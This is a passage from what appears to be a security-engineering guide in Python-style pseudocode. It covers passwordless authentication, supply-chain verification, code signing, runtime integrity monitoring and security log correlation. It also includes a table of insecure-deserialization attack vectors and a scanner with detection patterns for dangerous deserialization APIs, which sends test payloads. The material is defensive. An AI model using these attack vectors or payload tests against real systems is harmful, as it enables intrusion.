if session.typical_hours:
current_hour = context.timestamp.hour
if current_hour not in session.typical_hours:
anomalies.append({
'type': 'unusual_access_time',
'current_hour': current_hour,
'typical_hours': session.typical_hours
})
# Network anomalies
if session.typical_networks:
current_network = context.network
if current_network not in session.typical_networks:
anomalies.append({
'type': 'unusual_network',
'current_network': current_network,
'typical_networks': session.typical_networks
})
return anomaliesPasswordless Authentication Implementation
class PasswordlessAuthentication:
def __init__(self):
self.webauthn = WebAuthnHandler()
self.magic_links = MagicLinkHandler()
self.push_notifications = PushNotificationHandler()
self.security_keys = SecurityKeyManager()
def initiate_passwordless_auth(self, user_identifier):
"""
Initiate passwordless authentication
"""
# Step 1: Identify user
user = self.lookup_user(user_identifier)
if not user:
return AuthResponse(
success=False,
error='User not found'
)
# Step 2: Determine available methods
available_methods = self.get_available_methods(user)
# Step 3: Select method based on risk and user preference
method = self.select_auth_method(
user,
available_methods,
self.calculate_request_risk()
)
# Step 4: Initiate authentication
if method == 'webauthn':
return self.initiate_webauthn(user)
elif method == 'magic_link':
return self.initiate_magic_link(user)
elif method == 'push':
return self.initiate_push_notification(user)
elif method == 'security_key':
return self.initiate_security_key(user)
else:
return AuthResponse(
success=False,
error='No suitable authentication method'
)
def initiate_webauthn(self, user):
"""
Initiate WebAuthn authentication
"""
# Generate challenge
challenge = self.generate_challenge()
# Get user's credentials
credentials = self.get_user_credentials(user.id)
# Create options for authentication
options = {
'challenge': challenge,
'timeout': 60000,
'rpId': self.get_rp_id(),
'allowCredentials': [
{
'type': 'public-key',
'id': cred.id,
'transports': cred.transports
}
for cred in credentials
],
'userVerification': 'required'
}
# Store challenge for verification
self.store_challenge(user.id, challenge)
return AuthResponse(
success=True,
method='webauthn',
options=options
)
def verify_webauthn(self, user_id, assertion_response):
"""
Verify WebAuthn assertion
"""
# Retrieve stored challenge
stored_challenge = self.retrieve_challenge(user_id)
if not stored_challenge:
return VerificationResult(
success=False,
error='No pending challenge'
)
# Get user's credential
credential = self.get_credential(
user_id,
assertion_response.id
)
if not credential:
return VerificationResult(
success=False,
error='Unknown credential'
)
# Verify assertion
verification_result = self.webauthn.verify_assertion(
assertion_response,
credential.public_key,
stored_challenge,
self.get_rp_id()
)
if verification_result.success:
# Update credential usage
self.update_credential_usage(credential.id)
# Create session
session_token = self.create_session(user_id)
return VerificationResult(
success=True,
session_token=session_token,
user_id=user_id
)
else:
return VerificationResult(
success=False,
error=verification_result.error
)
def initiate_magic_link(self, user):
"""
Initiate magic link authentication
"""
# Generate unique token
token = self.generate_secure_token()
# Create secure link
link = self.create_magic_link(token)
# Store token with metadata
self.store_magic_token(
token=token,
user_id=user.id,
expires_at=datetime.now() + timedelta(minutes=10),
max_uses=1
)
# Send to user's verified email
self.send_magic_link_email(user.email, link)
return AuthResponse(
success=True,
method='magic_link',
message='Check your email for the magic link'
)
def verify_magic_link(self, token):
"""
Verify magic link token
"""
# Retrieve token metadata
token_data = self.retrieve_magic_token(token)
if not token_data:
return VerificationResult(
success=False,
error='Invalid token'
)
# Check expiration
if token_data.expires_at < datetime.now():
return VerificationResult(
success=False,
error='Token expired'
)
# Check usage limit
if token_data.uses >= token_data.max_uses:
return VerificationResult(
success=False,
error='Token already used'
)
# Increment usage
self.increment_token_usage(token)
# Create session
session_token = self.create_session(token_data.user_id)
return VerificationResult(
success=True,
session_token=session_token,
user_id=token_data.user_id
)Insecure Deserialization Exploitation Matrix
| Language | Serialization Format | Attack Vector | Impact |
|---|---|---|---|
| Java | Java Serialization | Gadget chains via ObjectInputStream |
RCE, DoS |
| .NET | BinaryFormatter | Type confusion, view state manipulation | RCE, auth bypass |
| Python | pickle | Arbitrary object construction | RCE, file access |
| PHP | unserialize() |
Object injection, property manipulation | RCE, SQLi |
| Ruby | Marshal | Constant caching, symbol DoS | RCE, memory corruption |
| Node.js | JSON.parse() |
Prototype pollution | Property injection |
Software Supply Chain Integrity Attacks
-
Build System Compromise
- Malicious build scripts
- Compromised CI/CD pipelines
- Toxic commits with hidden payloads
-
Dependency Repository Attacks
- Typosquatting packages
- Account takeover of maintainers
- Malicious updates to legitimate packages
-
Artifact Repository Attacks
- Malicious binaries replacing legitimate ones
- Signature forgery
- Metadata tampering
Deserialization Vulnerability Scanner
class DeserializationScanner:
def __init__(self):
self.gadget_chains = self.load_gadget_chains()
self.signature_database = self.load_signatures()
self.behavior_monitor = BehaviorMonitor()
def scan_application(self, app):
"""
Comprehensive deserialization vulnerability scan
"""
findings = []
# Phase 1: Static Analysis
static_findings = self.static_analysis(app.source_code)
findings.extend(static_findings)
# Phase 2: Dynamic Analysis
dynamic_findings = self.dynamic_analysis(app.runtime)
findings.extend(dynamic_findings)
# Phase 3: Behavioral Analysis
behavioral_findings = self.behavioral_analysis(app)
findings.extend(behavioral_findings)
# Phase 4: Exploit Verification
exploit_findings = self.exploit_verification(app, findings)
findings.extend(exploit_findings)
return self.prioritize_findings(findings)
def static_analysis(self, source_code):
"""
Static analysis for deserialization vulnerabilities
"""
findings = []
# Pattern matching for dangerous APIs
dangerous_patterns = {
'java': [
(r'ObjectInputStream', 'Java deserialization'),
(r'readObject\(', 'readObject method'),
(r'readResolve\(', 'readResolve method'),
(r'readExternal\(', 'readExternal method'),
(r'XMLDecoder', 'XML deserialization'),
(r'XStream', 'XStream deserialization'),
(r'JacksonObjectMapper', 'Jackson polymorphic deserialization'),
(r'@JsonTypeInfo', 'Jackson type information annotation')
],
'python': [
(r'pickle\.loads', 'Pickle deserialization'),
(r'pickle\.load', 'Pickle deserialization'),
(r'yaml\.load', 'YAML deserialization'),
(r'marshal\.loads', 'Marshal deserialization'),
(r'shelve', 'Shelve deserialization')
],
'php': [
(r'unserialize\(', 'PHP unserialize'),
(r'__wakeup\(', 'PHP wakeup magic method'),
(r'__destruct\(', 'PHP destruct magic method')
],
'net': [
(r'BinaryFormatter', '.NET BinaryFormatter'),
(r'Deserialize\(', '.NET deserialization'),
(r'JavaScriptSerializer', '.NET JavaScriptSerializer'),
(r'LosFormatter', '.NET LosFormatter')
]
}
for language, patterns in dangerous_patterns.items():
if language in source_code.language:
for pattern, description in patterns:
matches = re.finditer(pattern, source_code.content)
for match in matches:
# Get context
context = self.extract_context(
source_code.content,
match.start(),
100
)
findings.append({
'type': 'deserialization_api',
'language': language,
'api': match.group(),
'description': description,
'context': context,
'severity': 'High',
'location': {
'file': source_code.filepath,
'line': self.get_line_number(
source_code.content,
match.start()
)
}
})
# Class analysis for Java
if source_code.language == 'java':
class_findings = self.analyze_java_classes(source_code)
findings.extend(class_findings)
return findings
def analyze_java_classes(self, source_code):
"""
Analyze Java classes for serialization vulnerabilities
"""
findings = []
# Parse Java classes
classes = self.parse_java_classes(source_code.content)
for class_info in classes:
# Check for Serializable interface
if class_info.implements_serializable:
# Check for serialVersionUID
if not class_info.has_serial_version_uid:
findings.append({
'type': 'missing_serialversionuid',
'class': class_info.name,
'description': 'Serializable class missing serialVersionUID',
'severity': 'Medium',
'recommendation': 'Add explicit serialVersionUID field'
})
# Check for sensitive fields
sensitive_fields = self.find_sensitive_fields(class_info)
if sensitive_fields:
findings.append({
'type': 'sensitive_data_serialization',
'class': class_info.name,
'fields': sensitive_fields,
'description': 'Sensitive fields in serializable class',
'severity': 'High',
'recommendation': 'Mark fields as transient or implement custom serialization'
})
# Check for custom serialization methods
if class_info.has_custom_serialization:
# Analyze custom readObject/writeObject methods
custom_findings = self.analyze_custom_serialization(
class_info
)
findings.extend(custom_findings)
# Check for gadget chains
gadget_chain = self.check_gadget_chain(class_info)
if gadget_chain:
findings.append({
'type': 'gadget_chain',
'class': class_info.name,
'chain': gadget_chain,
'description': 'Potential gadget chain for deserialization attack',
'severity': 'Critical',
'recommendation': 'Avoid deserialization of untrusted data'
})
return findings
def dynamic_analysis(self, runtime):
"""
Dynamic analysis for deserialization vulnerabilities
"""
findings = []
# Monitor deserialization operations
with self.behavior_monitor.monitor_process(runtime.pid):
# Send various payloads
payloads = self.generate_deserialization_payloads()
for payload in payloads:
response = self.send_payload(runtime, payload)
# Analyze response for anomalies
anomalies = self.analyze_response_anomalies(response)
if anomalies:
findings.append({
'type': 'deserialization_anomaly',
'payload': payload.type,
'anomalies': anomalies,
'severity': 'High',
'description': 'Anomalous behavior during deserialization'
})
return findingsSoftware Supply Chain Integrity Verification
class SupplyChainIntegrityVerifier:
def __init__(self):
self.sbom_manager = SBOMManager()
self.artifact_verifier = ArtifactVerifier()
self.provenance_validator = ProvenanceValidator()
self.reputation_checker = ReputationChecker()
def verify_integrity(self, artifact, policy):
"""
End-to-end supply chain integrity verification
"""
verification_report = {
'artifact': artifact.identifier,
'checks': {},
'overall_status': 'pending'
}
# Check 1: Artifact Signature
signature_check = self.artifact_verifier.verify_signature(artifact)
verification_report['checks']['signature'] = signature_check
# Check 2: Hash Integrity
hash_check = self.artifact_verifier.verify_hash(artifact)
verification_report['checks']['hash'] = hash_check
# Check 3: SBOM Verification
sbom_check = self.sbom_manager.verify(artifact)
verification_report['checks']['sbom'] = sbom_check
# Check 4: Provenance Verification
provenance_check = self.provenance_validator.validate(
artifact.provenance
)
verification_report['checks']['provenance'] = provenance_check
# Check 5: Build Environment Verification
build_env_check = self.verify_build_environment(
artifact.provenance.build_environment
)
verification_report['checks']['build_environment'] = build_env_check
# Check 6: Dependency Verification
dependency_check = self.verify_dependencies(artifact.sbom)
verification_report['checks']['dependencies'] = dependency_check
# Check 7: Reputation Check
reputation_check = self.reputation_checker.check(artifact)
verification_report['checks']['reputation'] = reputation_check
# Check 8: Vulnerability Scan
vulnerability_check = self.scan_vulnerabilities(artifact)
verification_report['checks']['vulnerabilities'] = vulnerability_check
# Check 9: License Compliance
license_check = self.check_license_compliance(artifact.sbom)
verification_report['checks']['licenses'] = license_check
# Check 10: Behavioral Analysis
behavioral_check = self.analyze_behavior(artifact)
verification_report['checks']['behavior'] = behavioral_check
# Determine overall status
verification_report['overall_status'] = self.determine_overall_status(
verification_report['checks'],
policy
)
return verification_report
def verify_build_environment(self, build_env):
"""
Verify build environment integrity
"""
checks = []
# Check build system isolation
if not build_env.isolated:
checks.append({
'check': 'isolation',
'status': 'failed',
'description': 'Build environment not isolated'
})
# Check build system hermeticity
if not build_env.hermetic:
checks.append({
'check': 'hermetic',
'status': 'failed',
'description': 'Build not hermetic (network access during build)'
})
# Check build system reproducibility
reproducibility_check = self.check_reproducibility(build_env)
checks.extend(reproducibility_check)
# Check build system security controls
security_controls = self.check_security_controls(build_env)
checks.extend(security_controls)
# Determine overall status
if any(check['status'] == 'failed' for check in checks):
return {
'status': 'failed',
'details': checks
}
elif any(check['status'] == 'warning' for check in checks):
return {
'status': 'warning',
'details': checks
}
else:
return {
'status': 'passed',
'details': checks
}
def verify_dependencies(self, sbom):
"""
Verify dependency integrity
"""
checks = []
for component in sbom.components:
# Check dependency signature
if not component.signature:
checks.append({
'component': component.name,
'version': component.version,
'check': 'signature',
'status': 'failed',
'description': 'Dependency not signed'
})
# Check dependency provenance
if not component.provenance:
checks.append({
'component': component.name,
'version': component.version,
'check': 'provenance',
'status': 'warning',
'description': 'No provenance information available'
})
# Check dependency SBOM
if not component.sbom:
checks.append({
'component': component.name,
'version': component.version,
'check': 'sbom',
'status': 'warning',
'description': 'No SBOM available for dependency'
})
# Check dependency reputation
reputation = self.reputation_checker.check_component(component)
if reputation.score < 50:
checks.append({
'component': component.name,
'version': component.version,
'check': 'reputation',
'status': 'warning',
'description': f'Low reputation score: {reputation.score}'
})
if any(check['status'] == 'failed' for check in checks):
return {
'status': 'failed',
'details': checks
}
elif any(check['status'] == 'warning' for check in checks):
return {
'status': 'warning',
'details': checks
}
else:
return {
'status': 'passed',
'details': checks
}Code Signing and Verification System
class CodeSigningSystem:
def __init__(self):
self.key_manager = KeyManager()
self.signer = Signer()
self.verifier = Verifier()
self.timestamp_authority = TimestampAuthority()
self.revocation_checker = RevocationChecker()
def sign_artifact(self, artifact, signing_key_id):
"""
Sign artifact with comprehensive metadata
"""
# Step 1: Calculate artifact hash
artifact_hash = self.calculate_hash(artifact.content)
# Step 2: Generate signing metadata
metadata = {
'artifact_hash': artifact_hash,
'signing_time': datetime.now().isoformat(),
'signer': self.get_signer_identity(signing_key_id),
'artifact_info': {
'name': artifact.name,
'version': artifact.version,
'type': artifact.type,
'size': len(artifact.content)
},
'environment': {
'os': platform.system(),
'architecture': platform.machine(),
'signing_tool': 'CodeSigningSystem v1.0'
}
}
# Step 3: Create signature
signature = self.signer.sign(
metadata,
signing_key_id
)
# Step 4: Get timestamp from trusted authority
timestamp_token = self.timestamp_authority.get_timestamp(
signature
)
# Step 5: Create signed artifact
signed_artifact = SignedArtifact(
content=artifact.content,
metadata=metadata,
signature=signature,
timestamp=timestamp_token,
certificate_chain=self.key_manager.get_certificate_chain(
signing_key_id
)
)
# Step 6: Generate verification information
signed_artifact.verification_info = self.generate_verification_info(
signed_artifact
)
return signed_artifact
def verify_artifact(self, signed_artifact):
"""
Comprehensive artifact verification
"""
verification_report = {
'artifact': signed_artifact.metadata['artifact_info']['name'],
'checks': {},
'overall_status': 'pending'
}
# Check 1: Signature validity
signature_check = self.verifier.verify_signature(
signed_artifact.signature,
signed_artifact.metadata,
signed_artifact.certificate_chain
)
verification_report['checks']['signature'] = signature_check
# Check 2: Certificate chain validation
cert_chain_check = self.verifier.verify_certificate_chain(
signed_artifact.certificate_chain
)
verification_report['checks']['certificate_chain'] = cert_chain_check
# Check 3: Timestamp verification
timestamp_check = self.verifier.verify_timestamp(
signed_artifact.timestamp,
signed_artifact.signature
)
verification_report['checks']['timestamp'] = timestamp_check
# Check 4: Revocation status
revocation_check = self.revocation_checker.check(
signed_artifact.certificate_chain
)
verification_report['checks']['revocation'] = revocation_check
# Check 5: Artifact hash verification
current_hash = self.calculate_hash(signed_artifact.content)
expected_hash = signed_artifact.metadata['artifact_hash']
hash_check = {
'status': 'passed' if current_hash == expected_hash else 'failed',
'current_hash': current_hash,
'expected_hash': expected_hash
}
verification_report['checks']['hash'] = hash_check
# Check 6: Signer authorization
signer_check = self.verify_signer_authorization(
signed_artifact.certificate_chain,
signed_artifact.metadata['artifact_info']
)
verification_report['checks']['signer_authorization'] = signer_check
# Check 7: Policy compliance
policy_check = self.check_policy_compliance(signed_artifact)
verification_report['checks']['policy'] = policy_check
# Determine overall status
verification_report['overall_status'] = self.determine_verification_status(
verification_report['checks']
)
return verification_report
def generate_verification_info(self, signed_artifact):
"""
Generate information for runtime verification
"""
# Create minimal verification data for runtime checks
verification_info = {
'signature_digest': self.calculate_hash(
signed_artifact.signature
),
'certificate_fingerprints': [
self.calculate_certificate_fingerprint(cert)
for cert in signed_artifact.certificate_chain
],
'verification_policy': {
'required_checks': [
'signature',
'hash',
'timestamp',
'revocation'
],
'allowed_signers': self.get_allowed_signers(),
'max_age_days': 365
}
}
# Add signature for verification_info itself
verification_info['self_signature'] = self.signer.sign(
verification_info,
self.key_manager.get_verification_key_id()
)
return verification_infoRuntime Integrity Monitoring
class RuntimeIntegrityMonitor:
def __init__(self):
self.baseline_store = BaselineStore()
self.behavior_monitor = BehaviorMonitor()
self.anomaly_detector = AnomalyDetector()
self.response_engine = ResponseEngine()
def monitor_application(self, app_process):
"""
Monitor application runtime integrity
"""
# Establish baseline
baseline = self.create_baseline(app_process)
# Start monitoring threads
monitors = [
Thread(target=self.monitor_memory, args=(app_process, baseline)),
Thread(target=self.monitor_filesystem, args=(app_process, baseline)),
Thread(target=self.monitor_process, args=(app_process, baseline)),
Thread(target=self.monitor_network, args=(app_process, baseline)),
Thread(target=self.monitor_libraries, args=(app_process, baseline))
]
for monitor in monitors:
monitor.daemon = True
monitor.start()
# Main monitoring loop
while app_process.is_running():
# Collect alerts from monitors
alerts = self.collect_alerts()
# Analyze alerts
incidents = self.analyze_alerts(alerts)
# Respond to incidents
for incident in incidents:
self.respond_to_incident(incident)
# Update baseline if needed
if self.should_update_baseline():
baseline = self.update_baseline(app_process, baseline)
time.sleep(1) # Monitoring interval
def monitor_memory(self, process, baseline):
"""
Monitor memory integrity
"""
while process.is_running():
# Get memory regions
memory_regions = self.get_memory_regions(process.pid)
# Check for unexpected memory regions
unexpected_regions = self.find_unexpected_memory_regions(
memory_regions,
baseline.memory_regions
)
if unexpected_regions:
# Analyze unexpected regions
for region in unexpected_regions:
# Check if it's executable
if region.is_executable:
# Extract and analyze code
code = self.read_memory(process.pid, region)
# Check for shellcode patterns
if self.detect_shellcode(code):
self.alert({
'type': 'memory_shellcode',
'process': process.pid,
'region': region,
'severity': 'Critical'
})
# Check for code injection
if self.detect_code_injection(code, baseline):
self.alert({
'type': 'code_injection',
'process': process.pid,
'region': region,
'severity': 'Critical'
})
# Check for memory corruption
corruption = self.detect_memory_corruption(process, baseline)
if corruption:
self.alert({
'type': 'memory_corruption',
'process': process.pid,
'corruption_type': corruption.type,
'severity': 'High'
})
time.sleep(0.5) # Memory monitoring interval
def monitor_filesystem(self, process, baseline):
"""
Monitor filesystem integrity
"""
# Watch for file changes
watcher = FileSystemWatcher()
# Monitor critical directories
critical_dirs = [
'/usr/bin',
'/usr/sbin',
'/bin',
'/sbin',
'/etc',
process.working_directory
]
for directory in critical_dirs:
watcher.watch(directory, recursive=True)
while process.is_running():
# Get file system events
events = watcher.get_events()
for event in events:
# Check if event is suspicious
if self.is_suspicious_filesystem_event(event, baseline):
# Analyze the event
analysis = self.analyze_filesystem_event(event)
if analysis.suspicious:
self.alert({
'type': 'suspicious_filesystem_activity',
'process': process.pid,
'event': event,
'analysis': analysis,
'severity': analysis.severity
})
# Check file integrity
critical_files = self.get_critical_files(process)
for file_path in critical_files:
# Calculate current hash
current_hash = self.calculate_file_hash(file_path)
# Get expected hash from baseline
expected_hash = baseline.file_hashes.get(file_path)
if expected_hash and current_hash != expected_hash:
self.alert({
'type': 'file_tampering',
'process': process.pid,
'file': file_path,
'current_hash': current_hash,
'expected_hash': expected_hash,
'severity': 'Critical'
})
time.sleep(1) # Filesystem monitoring interval
def respond_to_incident(self, incident):
"""
Respond to integrity incident
"""
# Determine response based on incident type and severity
response_plan = self.response_engine.get_response_plan(
incident.type,
incident.severity
)
# Execute response actions
for action in response_plan.actions:
if action.type == 'isolate':
self.isolate_process(incident.process)
elif action.type == 'terminate':
self.terminate_process(incident.process)
elif action.type == 'rollback':
self.rollback_changes(incident)
elif action.type == 'alert':
self.send_alert(incident)
elif action.type == 'collect_forensics':
self.collect_forensic_data(incident)
elif action.type == 'block':
self.block_network(incident)
# Log incident and response
self.log_incident(incident, response_plan)Observability vs Monitoring vs Logging
- Logging: Discrete events with contextual data
- Metrics: Numerical measurements over time
- Traces: End-to-end request journey
- Profiling: Resource usage analysis
Advanced Logging Anti-Patterns
- Log Injection: User-controlled data in logs without sanitization
- Log Forging: Attacker creates false log entries
- Log Truncation: Critical data lost due to size limits
- Time Skew: Inconsistent timestamps across systems
- Log Retention Failure: Critical logs overwritten or deleted
Logging Gap Analysis Framework
class LoggingGapAnalyzer:
def __init__(self, application):
self.application = application
self.logging_standards = self.load_logging_standards()
self.compliance_frameworks = self.load_compliance_frameworks()
self.threat_models = self.load_threat_models()
def analyze_logging_coverage(self):
"""
Analyze logging coverage against requirements
"""
analysis = {
'coverage_gaps': [],
'compliance_gaps': [],
'security_gaps': [],
'recommendations': []
}
# Step 1: Map application components
components = self.map_application_components()
# Step 2: Analyze each component
for component in components:
component_analysis = self.analyze_component_logging(component)
# Identify gaps
gaps = self.identify_logging_gaps(component, component_analysis)
analysis['coverage_gaps'].extend(gaps)
# Check compliance
compliance_issues = self.check_compliance(component, component_analysis)
analysis['compliance_gaps'].extend(compliance_issues)
# Check security requirements
security_issues = self.check_security_requirements(
component,
component_analysis
)
analysis['security_gaps'].extend(security_issues)
# Step 3: Generate recommendations
analysis['recommendations'] = self.generate_recommendations(analysis)
# Step 4: Calculate coverage score
analysis['coverage_score'] = self.calculate_coverage_score(analysis)
return analysis
def analyze_component_logging(self, component):
"""
Analyze logging for a specific component
"""
analysis = {
'component': component.name,
'log_sources': [],
'log_events': [],
'log_attributes': {},
'coverage': {}
}
# Identify log sources
log_sources = self.identify_log_sources(component)
analysis['log_sources'] = log_sources
# Extract logged events
for source in log_sources:
events = self.extract_logged_events(source)
analysis['log_events'].extend(events)
# Analyze log attributes
attributes = self.analyze_log_attributes(source)
analysis['log_attributes'][source.name] = attributes
# Map to security events
security_events = self.map_to_security_events(analysis['log_events'])
analysis['security_events'] = security_events
# Calculate coverage
analysis['coverage'] = self.calculate_event_coverage(
security_events,
self.get_required_security_events(component)
)
return analysis
def identify_logging_gaps(self, component, analysis):
"""
Identify logging gaps for a component
"""
gaps = []
# Get required security events
required_events = self.get_required_security_events(component)
# Check coverage for each required event
for event_type, required_attributes in required_events.items():
if event_type not in analysis['coverage']:
# Event completely missing
gaps.append({
'component': component.name,
'type': 'missing_event',
'event': event_type,
'severity': 'High',
'description': f'Missing logging for {event_type} events'
})
else:
# Check attribute coverage
coverage = analysis['coverage'][event_type]
for attr, is_covered in coverage.items():
if not is_covered and attr in required_attributes:
gaps.append({
'component': component.name,
'type': 'missing_attribute',
'event': event_type,
'attribute': attr,
'severity': 'Medium',
'description': f'Missing attribute {attr} for {event_type} events'
})
# Check log quality
quality_issues = self.check_log_quality(analysis)
gaps.extend(quality_issues)
return gaps
def check_log_quality(self, analysis):
"""
Check log quality issues
"""
issues = []
for source_name, attributes in analysis['log_attributes'].items():
# Check for sensitive data in logs
sensitive_data = self.find_sensitive_data_in_logs(
attributes.get('sample_logs', [])
)
if sensitive_data:
issues.append({
'component': analysis['component'],
'type': 'sensitive_data_exposure',
'source': source_name,
'severity': 'High',
'description': f'Sensitive data found in logs from {source_name}',
'sensitive_data_types': sensitive_data
})
# Check log format consistency
if not attributes.get('consistent_format', True):
issues.append({
'component': analysis['component'],
'type': 'inconsistent_log_format',
'source': source_name,
'severity': 'Medium',
'description': f'Inconsistent log format in {source_name}'
})
# Check timestamp format
if not attributes.get('iso_timestamps', False):
issues.append({
'component': analysis['component'],
'type': 'non_iso_timestamps',
'source': source_name,
'severity': 'Low',
'description': f'Non-ISO timestamps in {source_name}'
})
return issuesLog Monitoring and Alerting Framework
class SecurityMonitoringSystem:
def __init__(self):
self.log_ingestors = self.setup_log_ingestors()
self.correlation_engine = CorrelationEngine()
self.anomaly_detectors = self.setup_anomaly_detectors()
self.alerting_system = AlertingSystem()
self.threat_intelligence = ThreatIntelligenceFeed()
def monitor_security_events(self):
"""
Continuous security event monitoring
"""
# Start log ingestion
for ingestor in self.log_ingestors:
ingestor.start()
# Main monitoring loop
while True:
# Collect events from all sources
events = self.collect_events()
# Enrich events with context
enriched_events = self.enrich_events(events)
# Correlate events
correlated_events = self.correlate_events(enriched_events)
# Detect anomalies
anomalies = self.detect_anomalies(correlated_events)
# Check against threat intelligence
threat_matches = self.check_threat_intelligence(correlated_events)
# Generate alerts
alerts = self.generate_alerts(
correlated_events,
anomalies,
threat_matches
)
# Process alerts
self.process_alerts(alerts)
# Update baselines
self.update_baselines(correlated_events)
time.sleep(1) # Monitoring interval
def correlate_events(self, events):
"""
Correlate security events across sources
"""
correlated_events = []
# Group events by session/user/ip
event_groups = self.group_events(events)
for group_key, group_events in event_groups.items():
# Sort by timestamp
sorted_events = sorted(group_events, key=lambda x: x.timestamp)
# Apply correlation rules
correlations = self.apply_correlation_rules(sorted_events)
# Create correlated event
if correlations:
correlated_event = CorrelatedEvent(
events=sorted_events,
correlations=correlations,
risk_score=self.calculate_risk_score(sorted_events, correlations)
)
correlated_events.append(correlated_event)
return correlated_events
def apply_correlation_rules(self, events):
"""
Apply correlation rules to event sequence
"""
correlations = []
# Rule 1: Failed login followed by successful login
failed_logins = [e for e in events if e.type == 'failed_login']
successful_logins = [e for e in events if e.type == 'successful_login']
if failed_logins and successful_logins:
# Check time proximity
last_failed = max(failed_logins, key=lambda x: x.timestamp)
next_successful = min(
[e for e in successful_logins if e.timestamp > last_failed.timestamp],
key=lambda x: x.timestamp,
default=None
)
if next_successful:
time_diff = next_successful.timestamp - last_failed.timestamp
if time_diff.total_seconds() < 300: # 5 minutes
correlations.append({
'type': 'password_guessing_success',
'events': [last_failed, next_successful],
'confidence': 'high'
})
# Rule 2: Multiple failed logins from same source
if len(failed_logins) >= 5:
time_range = events[-1].timestamp - events[0].timestamp
if time_range.total_seconds() < 300: # 5 minutes
correlations.append({
'type': 'brute_force_attempt',
'events': failed_logins,
'count': len(failed_logins),
'confidence': 'high'
})
# Rule 3: Access to sensitive resources
sensitive_access = [
e for e in events
if e.type == 'data_access' and e.resource_sensitivity == 'high'
]
if sensitive_access:
# Check if preceded by suspicious activity
suspicious_events = [
e for e in events
if e.risk_score > 50
and e.timestamp < sensitive_access[0].timestamp
]
if suspicious_events:
correlations.append({
'type': 'suspicious_sensitive_access',
'events': suspicious_events + sensitive_access,
'confidence': 'medium'
})
# Rule 4: Horizontal movement
source_ips = {e.source_ip for e in events if hasattr(e, 'source_ip')}
if len(source_ips) > 3:
# Multiple source IPs in short time
correlations.append({
'type': 'potential_lateral_movement',
'source_ips': list(source_ips),
'confidence': 'medium'
})
return correlations
def detect_anomalies(self, events):
"""
Detect anomalies in event patterns
"""
anomalies = []
# Load behavior baselines
baselines = self.load_baselines()
for event in events:
# Check against statistical baselines
if hasattr(event, 'user_id'):
user_baseline = baselines.get(event.user_id)
if user_baseline:
# Check time anomaly
if self.is_time_anomaly(event, user_baseline):
anomalies.append({
'type': 'unusual_access_time',
'event': event,
'anomaly': 'time'
})
# Check resource anomaly
if self.is_resource_anomaly(event, user_baseline):
anomalies.append({
'type': 'unusual_resource_access',
'event': event,
'anomaly': 'resource'
})
# Check volume anomaly
if self.is_volume_anomaly(event, user_baseline):
anomalies.append({
'type': 'unusual_activity_volume',
'event': event,
'anomaly': 'volume'
})
# Check global anomalies
global_anomalies = self.check_global_anomalies(event, baselines)
anomalies.extend(global_anomalies)
return anomalies
def generate_alerts(self, correlated_events, anomalies, threat_matches):
"""
Generate security alerts
"""
alerts = []
# Process correlated events
for event in correlated_events:
if event.risk_score > 70:
alerts.append({
'type': 'high_risk_correlation',
'event': event,
'severity': 'High',
'description': f'High risk correlated event: {event.correlations}'
})
# Process anomalies
for anomaly in anomalies:
severity = self.determine_anomaly_severity(anomaly)
alerts.append({
'type': 'anomaly_detected',
'anomaly': anomaly,
'severity': severity,
'description': f'Anomaly detected: {anomaly["type"]}'
})
# Process threat intelligence matches
for match in threat_matches:
alerts.append({
'type': 'threat_intelligence_match',
'match': match,
'severity': 'Critical',
'description': f'Threat intelligence match: {match.indicator_type}'
})
# Deduplicate alerts
unique_alerts = self.deduplicate_alerts(alerts)
return unique_alertsStructured Logging Implementation
class StructuredLogger:
LOG_SCHEMAS = {
'authentication': {
'required_fields': [
'timestamp', 'event_type', 'user_id',
'source_ip', 'success'
],
'optional_fields': [
'auth_method', 'session_id', 'user_agent',
'failure_reason', 'mfa_used', 'risk_score'
],
'sensitive_fields': ['password', 'token'],
'validation_rules': {
'timestamp': 'iso8601',
'event_type': 'enum:successful_login,failed_login,logout',
'success': 'boolean'
}
},
'authorization': {
'required_fields': [
'timestamp', 'event_type', 'user_id',
'resource', 'action', 'allowed'
],
'optional_fields': [
'resource_type', 'resource_id', 'policy_decision',
'attributes', 'risk_score'
],
'validation_rules': {
'event_type': 'enum:access_granted,access_denied',
'allowed': 'boolean'
}
},
'data_access': {
'required_fields': [
'timestamp', 'event_type', 'user_id',
'data_type', 'operation', 'record_count'
],
'optional_fields': [
'query', 'filters', 'sensitivity_level',
'compliance_context', 'retention_reason'
],
'sensitive_fields': ['query_parameters', 'record_data'],
'validation_rules': {
'event_type': 'enum:read,create,update,delete,export',
'operation': 'string'
}
},
'system': {
'required_fields': [
'timestamp', 'event_type', 'component',
'severity', 'message'
],
'optional_fields': [
'error_code', 'stack_trace', 'metrics',
'configuration', 'performance_data'
],
'validation_rules': {
'severity': 'enum:debug,info,warn,error,critical'
}
}
}
def __init__(self, component_name, log_schema):
self.component = component_name
self.schema = self.LOG_SCHEMAS.get(log_schema)
if not self.schema:
raise ValueError(f"Unknown log schema: {log_schema}")
self.sanitizer = LogSanitizer()
self.enricher = LogEnricher()
def log(self, event_type, data, severity='info'):
"""
Create structured log entry
"""
# Start with base structure
log_entry = {
'timestamp': datetime.now().isoformat() + 'Z',
'event_type': event_type,
'component': self.component,
'severity': severity,
'schema_version': '1.0'
}
# Add provided data
log_entry.update(data)
# Validate against schema
self.validate_log_entry(log_entry)
# Sanitize sensitive data
log_entry = self.sanitizer.sanitize(log_entry, self.schema)
# Enrich with context
log_entry = self.enricher.enrich(log_entry)
# Generate unique ID
log_entry['log_id'] = self.generate_log_id(log_entry)
# Calculate hash for integrity
log_entry['integrity_hash'] = self.calculate_integrity_hash(log_entry)
# Write to appropriate sinks
self.write_log(log_entry)
return log_entry
def validate_log_entry(self, log_entry):
"""
Validate log entry against schema
"""
errors = []
# Check required fields
for field in self.schema['required_fields']:
if field not in log_entry:
errors.append(f"Missing required field: {field}")
# Validate field values
validation_rules = self.schema.get('validation_rules', {})
for field, rule in validation_rules.items():
if field in log_entry:
value = log_entry[field]
if rule.startswith('enum:'):
allowed_values = rule[5:].split(',')
if value not in allowed_values:
errors.append(
f"Invalid value for {field}: {value}. "
f"Allowed: {allowed_values}"
)
elif rule == 'iso8601':
if not self.is_iso8601(value):
errors.append(f"Invalid ISO8601 timestamp: {value}")
elif rule == 'boolean':
if not isinstance(value, bool):
errors.append(f"Boolean expected for {field}: {value}")
if errors:
raise ValueError(f"Log validation failed: {', '.join(errors)}")
def write_log(self, log_entry):
"""
Write log to multiple sinks with appropriate handling
"""
sinks = self.get_log_sinks(log_entry['severity'])
for sink in sinks:
try:
